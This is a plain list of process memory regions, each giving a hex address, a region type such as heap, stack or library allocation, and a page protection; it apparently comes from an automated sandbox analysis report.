|
||
1D466C1C000
|
trusted library allocation
|
page read and write
|
||
207E0284000
|
heap
|
page read and write
|
||
1E9E2070000
|
heap
|
page read and write
|
||
7FF848F7D000
|
trusted library allocation
|
page read and write
|
||
1DA74F0E000
|
trusted library allocation
|
page read and write
|
||
207DC610000
|
unkown
|
page readonly
|
||
9CA867E000
|
stack
|
page read and write
|
||
207DD50C000
|
heap
|
page read and write
|
||
514A000
|
trusted library allocation
|
page read and write
|
||
201AD706000
|
trusted library allocation
|
page read and write
|
||
207D315A000
|
heap
|
page read and write
|
||
207D0DDE000
|
heap
|
page read and write
|
||
7FF789E1C000
|
unkown
|
page readonly
|
||
1E9E6414000
|
heap
|
page read and write
|
||
1C97255E000
|
heap
|
page read and write
|
||
1E9E42B3000
|
heap
|
page read and write
|
||
207E0103000
|
heap
|
page read and write
|
||
2BF9EB41000
|
trusted library allocation
|
page read and write
|
||
F7ED3FD000
|
stack
|
page read and write
|
||
7DF4A2050000
|
trusted library allocation
|
page execute and read and write
|
||
207D3002000
|
heap
|
page read and write
|
||
1D463C30000
|
heap
|
page read and write
|
||
207D0DCA000
|
heap
|
page read and write
|
||
1DA66A00000
|
trusted library allocation
|
page read and write
|
||
1D99F0D8000
|
heap
|
page read and write
|
||
1D99E7FB000
|
heap
|
page read and write
|
||
247BD90F000
|
heap
|
page read and write
|
||
126A1000
|
trusted library allocation
|
page read and write
|
||
1D99E7C4000
|
heap
|
page read and write
|
||
20025C30000
|
trusted library allocation
|
page read and write
|
||
1DA7D0CF000
|
heap
|
page read and write
|
||
1DA7D6B0000
|
heap
|
page read and write
|
||
4F44BFF000
|
stack
|
page read and write
|
||
14630A02000
|
heap
|
page read and write
|
||
1CF2A000
|
stack
|
page read and write
|
||
1E5D0000
|
heap
|
page read and write
|
||
7FF848B24000
|
trusted library allocation
|
page read and write
|
||
1D99E991000
|
heap
|
page read and write
|
||
207D0DE2000
|
heap
|
page read and write
|
||
1AC8C9F0000
|
heap
|
page read and write
|
||
7FF848B3D000
|
trusted library allocation
|
page execute and read and write
|
||
1C974270000
|
heap
|
page read and write
|
||
2A60000
|
heap
|
page execute and read and write
|
||
5390000
|
trusted library allocation
|
page read and write
|
||
207DCCE0000
|
trusted library allocation
|
page read and write
|
||
1D99EE62000
|
heap
|
page read and write
|
||
F7EB5FE000
|
stack
|
page read and write
|
||
207DE29B000
|
heap
|
page read and write
|
||
207DCF14000
|
heap
|
page read and write
|
||
207DE34B000
|
heap
|
page read and write
|
||
9CA8C7E000
|
stack
|
page read and write
|
||
7FF848D50000
|
trusted library allocation
|
page read and write
|
||
2EF937E000
|
unkown
|
page readonly
|
||
2EF8DFE000
|
stack
|
page read and write
|
||
1D463CF1000
|
heap
|
page read and write
|
||
5B6E27E000
|
stack
|
page read and write
|
||
5960AFF000
|
stack
|
page read and write
|
||
1DA6306C000
|
heap
|
page read and write
|
||
7FF848B4B000
|
trusted library allocation
|
page execute and read and write
|
||
C4BF0FD000
|
stack
|
page read and write
|
||
1463025B000
|
heap
|
page read and write
|
||
200245E0000
|
heap
|
page read and write
|
||
D10000
|
heap
|
page read and write
|
||
7FF848BE0000
|
trusted library allocation
|
page read and write
|
||
207DDC22000
|
heap
|
page read and write
|
||
1E9E41F0000
|
heap
|
page read and write
|
||
207DEE3B000
|
heap
|
page read and write
|
||
7FF848BC0000
|
trusted library allocation
|
page read and write
|
||
247BDAB0000
|
trusted library allocation
|
page read and write
|
||
207DE6D8000
|
heap
|
page read and write
|
||
1E9E419B000
|
heap
|
page read and write
|
||
1BA8E000
|
stack
|
page read and write
|
||
EDC000
|
heap
|
page read and write
|
||
2A3E000
|
stack
|
page read and write
|
||
7FF848B44000
|
trusted library allocation
|
page read and write
|
||
207D0DFC000
|
heap
|
page read and write
|
||
207D319F000
|
heap
|
page read and write
|
||
207D9E90000
|
trusted library allocation
|
page read and write
|
||
207DC612000
|
unkown
|
page readonly
|
||
F03000
|
trusted library allocation
|
page read and write
|
||
9EF000
|
heap
|
page read and write
|
||
1D99E872000
|
heap
|
page read and write
|
||
207DCFD5000
|
heap
|
page read and write
|
||
7FF848E40000
|
trusted library allocation
|
page read and write
|
||
20024340000
|
trusted library section
|
page read and write
|
||
207D26D0000
|
trusted library allocation
|
page read and write
|
||
207DCDFC000
|
unkown
|
page write copy
|
||
2EF897E000
|
unkown
|
page readonly
|
||
9CA8BFE000
|
stack
|
page read and write
|
||
1E9E3FE9000
|
heap
|
page read and write
|
||
2BF9EB4A000
|
trusted library allocation
|
page read and write
|
||
1D47DFED000
|
heap
|
page read and write
|
||
1E9E2050000
|
heap
|
page read and write
|
||
1DA74C51000
|
trusted library allocation
|
page read and write
|
||
207DC338000
|
trusted library allocation
|
page read and write
|
||
1DA65CE2000
|
trusted library allocation
|
page read and write
|
||
7FF848E10000
|
trusted library allocation
|
page read and write
|
||
2EF8A7E000
|
unkown
|
page readonly
|
||
1B1EF000
|
stack
|
page read and write
|
||
7FF848F50000
|
trusted library allocation
|
page read and write
|
||
201C52F7000
|
heap
|
page read and write
|
||
107D000
|
heap
|
page read and write
|
||
1AC9E55D000
|
trusted library allocation
|
page read and write
|
||
1D99EF65000
|
heap
|
page read and write
|
||
20025F21000
|
trusted library allocation
|
page read and write
|
||
207DCB7D000
|
heap
|
page read and write
|
||
7FF848CA0000
|
trusted library allocation
|
page read and write
|
||
247BF433000
|
trusted library allocation
|
page read and write
|
||
7FF848E80000
|
trusted library allocation
|
page read and write
|
||
7FF848E30000
|
trusted library allocation
|
page read and write
|
||
1D465930000
|
heap
|
page execute and read and write
|
||
1DA65818000
|
trusted library allocation
|
page read and write
|
||
201C5050000
|
trusted library allocation
|
page read and write
|
||
247BDB60000
|
heap
|
page read and write
|
||
201BCB74000
|
trusted library allocation
|
page read and write
|
||
294C000
|
trusted library allocation
|
page read and write
|
||
207DCCE0000
|
trusted library allocation
|
page read and write
|
||
7FF848D50000
|
trusted library allocation
|
page read and write
|
||
201C5276000
|
heap
|
page read and write
|
||
7FF848E40000
|
trusted library allocation
|
page read and write
|
||
9CA83DF000
|
stack
|
page read and write
|
||
7FF789DB1000
|
unkown
|
page execute read
|
||
1E9E226E000
|
heap
|
page read and write
|
||
981EBFB000
|
stack
|
page read and write
|
||
1DA632F0000
|
heap
|
page readonly
|
||
1D466BED000
|
trusted library allocation
|
page read and write
|
||
1DA632E0000
|
trusted library allocation
|
page read and write
|
||
207DEF02000
|
heap
|
page read and write
|
||
7FF789DEB000
|
unkown
|
page readonly
|
||
207DE35A000
|
heap
|
page read and write
|
||
200243D9000
|
heap
|
page read and write
|
||
2DAF000
|
stack
|
page read and write
|
||
207E009D000
|
heap
|
page read and write
|
||
201BCB21000
|
trusted library allocation
|
page read and write
|
||
A05000
|
heap
|
page read and write
|
||
1C974630000
|
heap
|
page read and write
|
||
7FF848D20000
|
trusted library allocation
|
page read and write
|
||
F60000
|
heap
|
page read and write
|
||
7FF848CB7000
|
trusted library allocation
|
page read and write
|
||
F7EA1FE000
|
stack
|
page read and write
|
||
2BFB7520000
|
heap
|
page execute and read and write
|
||
1D99EFDF000
|
heap
|
page read and write
|
||
7FF848B20000
|
trusted library allocation
|
page read and write
|
||
207D3194000
|
heap
|
page read and write
|
||
222345B0000
|
heap
|
page read and write
|
||
7FF848C06000
|
trusted library allocation
|
page execute and read and write
|
||
1B0E0000
|
heap
|
page execute and read and write
|
||
12E13000
|
trusted library allocation
|
page read and write
|
||
1D99E9A2000
|
heap
|
page read and write
|
||
207DCC80000
|
trusted library allocation
|
page read and write
|
||
1D463C90000
|
heap
|
page read and write
|
||
7FF848BF0000
|
trusted library allocation
|
page execute and read and write
|
||
207DEF8A000
|
heap
|
page read and write
|
||
7FF848CB4000
|
trusted library allocation
|
page read and write
|
||
14630329000
|
heap
|
page read and write
|
||
207DCFE0000
|
heap
|
page read and write
|
||
1D99E898000
|
heap
|
page read and write
|
||
146358C3000
|
heap
|
page read and write
|
||
207E0092000
|
heap
|
page read and write
|
||
2BF9EB30000
|
heap
|
page read and write
|
||
F7EB4FA000
|
stack
|
page read and write
|
||
5B6E17E000
|
stack
|
page read and write
|
||
207DDFA0000
|
trusted library allocation
|
page read and write
|
||
2EF88FE000
|
stack
|
page read and write
|
||
7FF848D40000
|
trusted library allocation
|
page read and write
|
||
2BF9CE10000
|
heap
|
page read and write
|
||
207DEFE6000
|
heap
|
page read and write
|
||
7FF848CD0000
|
trusted library allocation
|
page execute and read and write
|
||
F7EA2F5000
|
stack
|
page read and write
|
||
207DCA9C000
|
heap
|
page read and write
|
||
207DCC78000
|
unkown
|
page readonly
|
||
207DCF59000
|
heap
|
page read and write
|
||
2003E7BA000
|
heap
|
page read and write
|
||
207E0050000
|
heap
|
page read and write
|
||
24E97F70000
|
heap
|
page read and write
|
||
1D99E790000
|
heap
|
page read and write
|
||
F7EB8F9000
|
stack
|
page read and write
|
||
247D7DA8000
|
heap
|
page read and write
|
||
7FF848B3D000
|
trusted library allocation
|
page execute and read and write
|
||
1C9744E0000
|
trusted library allocation
|
page read and write
|
||
1DA7CC22000
|
heap
|
page read and write
|
||
1E9E2114000
|
heap
|
page read and write
|
||
1D47DD3A000
|
heap
|
page read and write
|
||
1B06F000
|
stack
|
page read and write
|
||
1D99E7F3000
|
heap
|
page read and write
|
||
1C97255B000
|
heap
|
page read and write
|
||
1D465900000
|
heap
|
page read and write
|
||
981E4FE000
|
stack
|
page read and write
|
||
1AFCF000
|
stack
|
page read and write
|
||
207DC750000
|
trusted library allocation
|
page read and write
|
||
2003E668000
|
heap
|
page read and write
|
||
F7EC8F9000
|
stack
|
page read and write
|
||
7FF848E70000
|
trusted library allocation
|
page read and write
|
||
207E00E6000
|
heap
|
page read and write
|
||
2E00000
|
heap
|
page execute and read and write
|
||
7FF848F20000
|
trusted library allocation
|
page read and write
|
||
207DEFEC000
|
heap
|
page read and write
|
||
201AB0A3000
|
heap
|
page read and write
|
||
207DD870000
|
trusted library allocation
|
page read and write
|
||
201C527A000
|
heap
|
page read and write
|
||
1C972547000
|
heap
|
page read and write
|
||
146358F2000
|
heap
|
page read and write
|
||
D07A079000
|
stack
|
page read and write
|
||
1D99EFCD000
|
heap
|
page read and write
|
||
1DA7D408000
|
heap
|
page read and write
|
||
7FF848B14000
|
trusted library allocation
|
page read and write
|
||
207DCC7E000
|
unkown
|
page read and write
|
||
207E0113000
|
heap
|
page read and write
|
||
7FF848D09000
|
trusted library allocation
|
page read and write
|
||
1D99E895000
|
heap
|
page read and write
|
||
1AC8C7A2000
|
unkown
|
page readonly
|
||
7FF848CB2000
|
trusted library allocation
|
page read and write
|
||
207DE255000
|
heap
|
page read and write
|
||
1DA6599C000
|
trusted library allocation
|
page read and write
|
||
9FE000
|
heap
|
page read and write
|
||
7FF848E60000
|
trusted library allocation
|
page read and write
|
||
DCE000
|
stack
|
page read and write
|
||
1D99F001000
|
heap
|
page read and write
|
||
1C7F0000
|
heap
|
page read and write
|
||
14635800000
|
heap
|
page read and write
|
||
201ACB01000
|
trusted library allocation
|
page read and write
|
||
1E9E41F1000
|
heap
|
page read and write
|
||
1E9E3FE0000
|
heap
|
page read and write
|
||
1D463E00000
|
heap
|
page readonly
|
||
C4BEFFF000
|
stack
|
page read and write
|
||
207DEE00000
|
heap
|
page read and write
|
||
7FF848DE0000
|
trusted library allocation
|
page read and write
|
||
1DA7D0F3000
|
heap
|
page read and write
|
||
207DD780000
|
trusted library allocation
|
page read and write
|
||
207DE000000
|
heap
|
page read and write
|
||
207DE287000
|
heap
|
page read and write
|
||
1E9E5746000
|
heap
|
page read and write
|
||
5E0000
|
heap
|
page read and write
|
||
207DCFCA000
|
heap
|
page read and write
|
||
1DA630B7000
|
heap
|
page read and write
|
||
201BCF19000
|
trusted library allocation
|
page read and write
|
||
7FF848CC0000
|
trusted library allocation
|
page read and write
|
||
207DD79A000
|
unkown
|
page readonly
|
||
7FF848F80000
|
trusted library allocation
|
page read and write
|
||
22234720000
|
heap
|
page read and write
|
||
1B690000
|
heap
|
page read and write
|
||
7FF848CC2000
|
trusted library allocation
|
page read and write
|
||
1DA63300000
|
heap
|
page read and write
|
||
2BFAEB43000
|
trusted library allocation
|
page read and write
|
||
4B1D000
|
trusted library allocation
|
page read and write
|
||
207DE389000
|
heap
|
page read and write
|
||
7FF848D70000
|
trusted library allocation
|
page read and write
|
||
207E00C5000
|
heap
|
page read and write
|
||
207DCF6B000
|
heap
|
page read and write
|
||
207E0254000
|
heap
|
page read and write
|
||
207D315E000
|
heap
|
page read and write
|
||
7FF848B34000
|
trusted library allocation
|
page read and write
|
||
207DDC22000
|
heap
|
page read and write
|
||
222345EC000
|
heap
|
page read and write
|
||
7FF848E5C000
|
trusted library allocation
|
page read and write
|
||
1D99E88B000
|
heap
|
page read and write
|
||
5B6F40E000
|
stack
|
page read and write
|
||
207DC690000
|
trusted library allocation
|
page read and write
|
||
1D99E897000
|
heap
|
page read and write
|
||
207DE6C7000
|
heap
|
page read and write
|
||
201C5356000
|
heap
|
page read and write
|
||
207E0302000
|
heap
|
page read and write
|
||
21EFAFD000
|
stack
|
page read and write
|
||
2BF9CD80000
|
unkown
|
page readonly
|
||
1AC8E626000
|
trusted library allocation
|
page read and write
|
||
207D5D95000
|
heap
|
page read and write
|
||
201AD552000
|
trusted library allocation
|
page read and write
|
||
7FF848B20000
|
trusted library allocation
|
page read and write
|
||
7FF848F60000
|
trusted library allocation
|
page read and write
|
||
1D99E9F3000
|
heap
|
page read and write
|
||
7A0000
|
heap
|
page read and write
|
||
7FF848D20000
|
trusted library allocation
|
page execute and read and write
|
||
7FF848E20000
|
trusted library allocation
|
page read and write
|
||
207DE2B3000
|
heap
|
page read and write
|
||
E88000
|
heap
|
page read and write
|
||
1D99E760000
|
heap
|
page read and write
|
||
207D0C99000
|
heap
|
page read and write
|
||
207DE7CB000
|
heap
|
page read and write
|
||
A1C000
|
heap
|
page read and write
|
||
1C976440000
|
heap
|
page read and write
|
||
7FF848DF0000
|
trusted library allocation
|
page read and write
|
||
7FF848D60000
|
trusted library allocation
|
page read and write
|
||
7FF848B03000
|
trusted library allocation
|
page execute and read and write
|
||
201ADE3F000
|
trusted library allocation
|
page read and write
|
||
7FF848D40000
|
trusted library allocation
|
page read and write
|
||
9EC000
|
heap
|
page read and write
|
||
7FF789DB1000
|
unkown
|
page execute read
|
||
7FF848D00000
|
trusted library allocation
|
page execute and read and write
|
||
1D4658B0000
|
heap
|
page execute and read and write
|
||
1D99E9B1000
|
heap
|
page read and write
|
||
B30000
|
trusted library allocation
|
page read and write
|
||
537B000
|
trusted library allocation
|
page read and write
|
||
207D3184000
|
heap
|
page read and write
|
||
1D99EF54000
|
heap
|
page read and write
|
||
1B490000
|
heap
|
page execute and read and write
|
||
7FF848B20000
|
trusted library allocation
|
page read and write
|
||
222345DB000
|
heap
|
page read and write
|
||
1ADFC000
|
heap
|
page read and write
|
||
201C53A9000
|
heap
|
page read and write
|
||
7FF848EF3000
|
trusted library allocation
|
page read and write
|
||
1C9728AE000
|
heap
|
page read and write
|
||
532F000
|
trusted library allocation
|
page read and write
|
||
1B6FC000
|
heap
|
page read and write
|
||
4F455FE000
|
stack
|
page read and write
|
||
1D99E8A9000
|
heap
|
page read and write
|
||
1C39B000
|
heap
|
page read and write
|
||
207DCA00000
|
heap
|
page read and write
|
||
1B98A000
|
stack
|
page read and write
|
||
1DA659D7000
|
trusted library allocation
|
page read and write
|
||
20025C00000
|
heap
|
page read and write
|
||
2BF9D0B3000
|
trusted library allocation
|
page read and write
|
||
1D99F013000
|
heap
|
page read and write
|
||
1D99E7C5000
|
heap
|
page read and write
|
||
207DE378000
|
heap
|
page read and write
|
||
1D99EF32000
|
heap
|
page read and write
|
||
207DE144000
|
heap
|
page read and write
|
||
7FF848B30000
|
trusted library allocation
|
page read and write
|
||
247BF475000
|
trusted library allocation
|
page read and write
|
||
207DC9D0000
|
trusted library allocation
|
page read and write
|
||
207DC5E0000
|
trusted library allocation
|
page read and write
|
||
53D3000
|
trusted library allocation
|
page read and write
|
||
20025D84000
|
heap
|
page read and write
|
||
1C972410000
|
heap
|
page read and write
|
||
1C1F0000
|
unclassified section
|
page readonly
|
||
7FF848F63000
|
trusted library allocation
|
page read and write
|
||
207DC310000
|
trusted library allocation
|
page read and write
|
||
146358FF000
|
heap
|
page read and write
|
||
7FF848F46000
|
trusted library allocation
|
page read and write
|
||
1D42D000
|
stack
|
page read and write
|
||
207DD7F0000
|
unkown
|
page readonly
|
||
207DEC16000
|
unkown
|
page readonly
|
||
1D99E85B000
|
heap
|
page read and write
|
||
1D99EA5D000
|
heap
|
page read and write
|
||
1E9E20A8000
|
heap
|
page read and write
|
||
201AAFF4000
|
heap
|
page read and write
|
||
207D318E000
|
heap
|
page read and write
|
||
1DA7D0BF000
|
heap
|
page read and write
|
||
1C9725AC000
|
heap
|
page read and write
|
||
1D99E7EE000
|
heap
|
page read and write
|
||
207DCAD2000
|
heap
|
page read and write
|
||
207DC650000
|
trusted library allocation
|
page read and write
|
||
207D5D35000
|
heap
|
page read and write
|
||
247D7D20000
|
heap
|
page read and write
|
||
12693000
|
trusted library allocation
|
page read and write
|
||
4969000
|
trusted library allocation
|
page read and write
|
||
207DD790000
|
unkown
|
page readonly
|
||
1DA7D070000
|
heap
|
page read and write
|
||
BAB5CFE000
|
stack
|
page read and write
|
||
7FF848C20000
|
trusted library allocation
|
page execute and read and write
|
||
207E0243000
|
heap
|
page read and write
|
||
52F1000
|
trusted library allocation
|
page read and write
|
||
7FF848E70000
|
trusted library allocation
|
page read and write
|
||
7FF789E1F000
|
unkown
|
page write copy
|
||
7FF848D10000
|
trusted library allocation
|
page read and write
|
||
7FF848B04000
|
trusted library allocation
|
page read and write
|
||
1D47DC80000
|
heap
|
page read and write
|
||
5B6E0FE000
|
stack
|
page read and write
|
||
201C53BA000
|
heap
|
page read and write
|
||
F70000
|
heap
|
page execute and read and write
|
||
1D99E7D1000
|
heap
|
page read and write
|
||
207DEFBD000
|
heap
|
page read and write
|
||
207DD8F0000
|
trusted library allocation
|
page read and write
|
||
1AAA3000
|
trusted library allocation
|
page read and write
|
||
7FF848E80000
|
trusted library allocation
|
page read and write
|
||
7FF848E80000
|
trusted library allocation
|
page read and write
|
||
207DC730000
|
trusted library allocation
|
page read and write
|
||
207D0D5F000
|
heap
|
page read and write
|
||
1D463DD0000
|
trusted library allocation
|
page read and write
|
||
2BF9CE8F000
|
heap
|
page read and write
|
||
20027269000
|
trusted library allocation
|
page read and write
|
||
201AE453000
|
trusted library allocation
|
page read and write
|
||
CFF000
|
heap
|
page read and write
|
||
1DA7D4AD000
|
heap
|
page read and write
|
||
A45000
|
heap
|
page read and write
|
||
1DA64E48000
|
trusted library allocation
|
page read and write
|
||
2BF9D0D0000
|
heap
|
page execute and read and write
|
||
7FF848F40000
|
trusted library allocation
|
page read and write
|
||
1463027C000
|
heap
|
page read and write
|
||
1D99EF54000
|
heap
|
page read and write
|
||
1C9724F0000
|
heap
|
page read and write
|
||
7FF848BAC000
|
trusted library allocation
|
page execute and read and write
|
||
201ADA9F000
|
trusted library allocation
|
page read and write
|
||
207DC5E0000
|
trusted library allocation
|
page read and write
|
||
1C97254F000
|
heap
|
page read and write
|
||
7FF848D20000
|
trusted library allocation
|
page execute and read and write
|
||
207E04A0000
|
heap
|
page read and write
|
||
207DCC60000
|
trusted library allocation
|
page read and write
|
||
207DC6C0000
|
trusted library allocation
|
page read and write
|
||
5B6F20C000
|
stack
|
page read and write
|
||
1D4670C7000
|
trusted library allocation
|
page read and write
|
||
207E048F000
|
heap
|
page read and write
|
||
7FF848C16000
|
trusted library allocation
|
page execute and read and write
|
||
52FD000
|
trusted library allocation
|
page read and write
|
||
207DE68A000
|
heap
|
page read and write
|
||
20025CD0000
|
heap
|
page read and write
|
||
201ADBC1000
|
trusted library allocation
|
page read and write
|
||
207E0343000
|
heap
|
page read and write
|
||
207DC9E0000
|
trusted library allocation
|
page read and write
|
||
1C97255B000
|
heap
|
page read and write
|
||
1E9E20BA000
|
heap
|
page read and write
|
||
4F451FD000
|
stack
|
page read and write
|
||
12948000
|
trusted library allocation
|
page read and write
|
||
7FF848B1B000
|
trusted library allocation
|
page read and write
|
||
D0C000
|
heap
|
page read and write
|
||
204A67F000
|
stack
|
page read and write
|
||
1DA7D432000
|
heap
|
page read and write
|
||
7FF848D30000
|
trusted library allocation
|
page read and write
|
||
7FF848E50000
|
trusted library allocation
|
page read and write
|
||
1E9E1F60000
|
heap
|
page read and write
|
||
207DD67C000
|
unkown
|
page read and write
|
||
7FF848CB1000
|
trusted library allocation
|
page read and write
|
||
1D99E9C1000
|
heap
|
page read and write
|
||
1D467294000
|
trusted library allocation
|
page read and write
|
||
F7EC6FD000
|
stack
|
page read and write
|
||
CD0000
|
heap
|
page read and write
|
||
F7ED9FF000
|
stack
|
page read and write
|
||
9CA89F9000
|
stack
|
page read and write
|
||
207DEF9D000
|
heap
|
page read and write
|
||
1E9E20C2000
|
heap
|
page read and write
|
||
1DA633A4000
|
heap
|
page read and write
|
||
7FF848BF6000
|
trusted library allocation
|
page execute and read and write
|
||
146300F0000
|
heap
|
page read and write
|
||
2930000
|
heap
|
page execute and read and write
|
||
14630A00000
|
heap
|
page read and write
|
||
2003E6EF000
|
heap
|
page read and write
|
||
E5F000
|
stack
|
page read and write
|
||
207DD638000
|
unkown
|
page readonly
|
||
1AC2D000
|
stack
|
page read and write
|
||
207DCF70000
|
heap
|
page read and write
|
||
7FF848D08000
|
trusted library allocation
|
page read and write
|
||
BDE000
|
heap
|
page read and write
|
||
1D99E899000
|
heap
|
page read and write
|
||
AF1000
|
stack
|
page read and write
|
||
1E9E6392000
|
heap
|
page read and write
|
||
7FF848D30000
|
trusted library allocation
|
page read and write
|
||
1D99E7D0000
|
heap
|
page read and write
|
||
207D5A90000
|
trusted library allocation
|
page read and write
|
||
7FF848CF0000
|
trusted library allocation
|
page execute and read and write
|
||
207DC7C0000
|
trusted library allocation
|
page read and write
|
||
7FF848DA0000
|
trusted library allocation
|
page read and write
|
||
207DD58E000
|
heap
|
page read and write
|
||
20027202000
|
trusted library allocation
|
page read and write
|
||
1D99E818000
|
heap
|
page read and write
|
||
201AC960000
|
trusted library allocation
|
page read and write
|
||
1AC8C7A0000
|
unkown
|
page readonly
|
||
1D99E9D4000
|
heap
|
page read and write
|
||
7FF848B20000
|
trusted library allocation
|
page read and write
|
||
7FF848BD6000
|
trusted library allocation
|
page read and write
|
||
207D31A6000
|
heap
|
page read and write
|
||
24E97F90000
|
heap
|
page read and write
|
||
A16000
|
heap
|
page read and write
|
||
1DA664B3000
|
trusted library allocation
|
page read and write
|
||
BAB53EF000
|
stack
|
page read and write
|
||
1D4656D7000
|
heap
|
page execute and read and write
|
||
14630278000
|
heap
|
page read and write
|
||
1E9E2162000
|
heap
|
page read and write
|
||
1D99E8A9000
|
heap
|
page read and write
|
||
1D99E826000
|
heap
|
page read and write
|
||
207D5AD8000
|
trusted library allocation
|
page read and write
|
||
2223466D000
|
heap
|
page read and write
|
||
201BCDF2000
|
trusted library allocation
|
page read and write
|
||
207D0C96000
|
heap
|
page read and write
|
||
2EF87FE000
|
stack
|
page read and write
|
||
B40000
|
heap
|
page read and write
|
||
525C000
|
trusted library allocation
|
page read and write
|
||
5315000
|
trusted library allocation
|
page read and write
|
||
1D99EF10000
|
heap
|
page read and write
|
||
F7ECAFC000
|
stack
|
page read and write
|
||
207DD400000
|
heap
|
page read and write
|
||
1D99EF66000
|
heap
|
page read and write
|
||
201AB036000
|
heap
|
page read and write
|
||
7FF848AF3000
|
trusted library allocation
|
page execute and read and write
|
||
207DDF80000
|
remote allocation
|
page read and write
|
||
7FF848E78000
|
trusted library allocation
|
page read and write
|
||
247BD6F2000
|
unkown
|
page readonly
|
||
7FF848BC0000
|
trusted library allocation
|
page read and write
|
||
1DA63380000
|
heap
|
page read and write
|
||
1D99E7C0000
|
heap
|
page read and write
|
||
BAB5EFD000
|
stack
|
page read and write
|
||
1D466C83000
|
trusted library allocation
|
page read and write
|
||
1E9E20DE000
|
heap
|
page read and write
|
||
201C5045000
|
heap
|
page read and write
|
||
101B000
|
heap
|
page read and write
|
||
7FF848CE0000
|
trusted library allocation
|
page execute and read and write
|
||
7FF789DB0000
|
unkown
|
page readonly
|
||
207DD8A2000
|
unkown
|
page read and write
|
||
7FF637390000
|
unkown
|
page readonly
|
||
1B7DF000
|
stack
|
page read and write
|
||
1D99E8A9000
|
heap
|
page read and write
|
||
2BFB72A0000
|
heap
|
page read and write
|
||
7FF848D10000
|
trusted library allocation
|
page read and write
|
||
1B4BE000
|
stack
|
page read and write
|
||
BAB5AFC000
|
stack
|
page read and write
|
||
2951000
|
trusted library allocation
|
page read and write
|
||
7FF848E58000
|
trusted library allocation
|
page read and write
|
||
207DCB2A000
|
heap
|
page read and write
|
||
7FF848F20000
|
trusted library allocation
|
page read and write
|
||
1E9E21B0000
|
heap
|
page read and write
|
||
1E9E2113000
|
heap
|
page read and write
|
||
F94000
|
heap
|
page read and write
|
||
7FF848B12000
|
trusted library allocation
|
page read and write
|
||
201C501F000
|
heap
|
page read and write
|
||
9CA8CFE000
|
stack
|
page read and write
|
||
1C442000
|
heap
|
page read and write
|
||
247BD7BA000
|
unkown
|
page readonly
|
||
207E008D000
|
heap
|
page read and write
|
||
207DD672000
|
unkown
|
page readonly
|
||
2EF76BB000
|
stack
|
page read and write
|
||
22234681000
|
heap
|
page read and write
|
||
1DA63042000
|
heap
|
page read and write
|
||
207DD7A0000
|
trusted library allocation
|
page read and write
|
||
C9F000
|
heap
|
page read and write
|
||
1D99E7CB000
|
heap
|
page read and write
|
||
207DD640000
|
trusted library allocation
|
page read and write
|
||
F7ED4F9000
|
stack
|
page read and write
|
||
207DE323000
|
heap
|
page read and write
|
||
539C000
|
trusted library allocation
|
page read and write
|
||
1BB8C000
|
stack
|
page read and write
|
||
207D0C2B000
|
heap
|
page read and write
|
||
1E9E211D000
|
heap
|
page read and write
|
||
201AE924000
|
trusted library allocation
|
page read and write
|
||
D0A000
|
heap
|
page read and write
|
||
207D5E10000
|
trusted library section
|
page readonly
|
||
1D99EA73000
|
heap
|
page read and write
|
||
1D99E80E000
|
heap
|
page read and write
|
||
1DA64C21000
|
trusted library allocation
|
page read and write
|
||
2BF9D030000
|
heap
|
page read and write
|
||
12941000
|
trusted library allocation
|
page read and write
|
||
1AC2E000
|
stack
|
page read and write
|
||
7FF848CE0000
|
trusted library allocation
|
page read and write
|
||
1D99E897000
|
heap
|
page read and write
|
||
200271D2000
|
trusted library allocation
|
page read and write
|
||
9C6EFFF000
|
stack
|
page read and write
|
||
7FF6373EB000
|
unkown
|
page write copy
|
||
14635902000
|
heap
|
page read and write
|
||
207DDC24000
|
heap
|
page read and write
|
||
207DEF9D000
|
heap
|
page read and write
|
||
207DD640000
|
trusted library allocation
|
page read and write
|
||
1D99E8A9000
|
heap
|
page read and write
|
||
9CA887E000
|
stack
|
page read and write
|
||
207DC8A0000
|
trusted library allocation
|
page read and write
|
||
207DC8C0000
|
trusted library allocation
|
page read and write
|
||
207DCF6E000
|
heap
|
page read and write
|
||
7FF848D40000
|
trusted library allocation
|
page read and write
|
||
12691000
|
trusted library allocation
|
page read and write
|
||
1B4D0000
|
heap
|
page execute and read and write
|
||
7FF848B1D000
|
trusted library allocation
|
page execute and read and write
|
||
D7E000
|
stack
|
page read and write
|
||
1DA64C10000
|
heap
|
page execute and read and write
|
||
247BDAD0000
|
trusted library allocation
|
page read and write
|
||
1D99EA06000
|
heap
|
page read and write
|
||
1C97254B000
|
heap
|
page read and write
|
||
207DC7C6000
|
unkown
|
page readonly
|
||
14635690000
|
trusted library allocation
|
page read and write
|
||
1463590C000
|
heap
|
page read and write
|
||
21EFDFE000
|
stack
|
page read and write
|
||
1D4666BE000
|
trusted library allocation
|
page read and write
|
||
7FF848B3B000
|
trusted library allocation
|
page execute and read and write
|
||
207E002F000
|
heap
|
page read and write
|
||
1AC8E604000
|
trusted library allocation
|
page read and write
|
||
B90000
|
trusted library allocation
|
page read and write
|
||
7FF848DC0000
|
trusted library allocation
|
page read and write
|
||
1079000
|
heap
|
page read and write
|
||
1E9E20A4000
|
heap
|
page read and write
|
||
7FF848B00000
|
trusted library allocation
|
page read and write
|
||
9CA99CC000
|
stack
|
page read and write
|
||
20026E9E000
|
trusted library allocation
|
page read and write
|
||
7FF848AF4000
|
trusted library allocation
|
page read and write
|
||
1D99E7B8000
|
heap
|
page read and write
|
||
207E0434000
|
heap
|
page read and write
|
||
E5D000
|
heap
|
page read and write
|
||
207DCB4B000
|
heap
|
page read and write
|
||
207DC7A0000
|
trusted library allocation
|
page read and write
|
||
207D5E30000
|
trusted library section
|
page readonly
|
||
2EF927E000
|
unkown
|
page readonly
|
||
1E9E20AD000
|
heap
|
page read and write
|
||
204A6F7000
|
stack
|
page read and write
|
||
1D99F072000
|
heap
|
page read and write
|
||
F7EBBFE000
|
stack
|
page read and write
|
||
BAB62FF000
|
stack
|
page read and write
|
||
204AB7B000
|
stack
|
page read and write
|
||
7FF848B50000
|
trusted library allocation
|
page read and write
|
||
201ADD52000
|
trusted library allocation
|
page read and write
|
||
7FF848B14000
|
trusted library allocation
|
page read and write
|
||
207D5C12000
|
heap
|
page read and write
|
||
207DEFB5000
|
heap
|
page read and write
|
||
F7ECFFD000
|
stack
|
page read and write
|
||
1C9728A4000
|
heap
|
page read and write
|
||
1B2DE000
|
stack
|
page read and write
|
||
20035F95000
|
trusted library allocation
|
page read and write
|
||
D07AF4E000
|
stack
|
page read and write
|
||
207DE32F000
|
heap
|
page read and write
|
||
F7EAAFA000
|
stack
|
page read and write
|
||
1E9E6495000
|
heap
|
page read and write
|
||
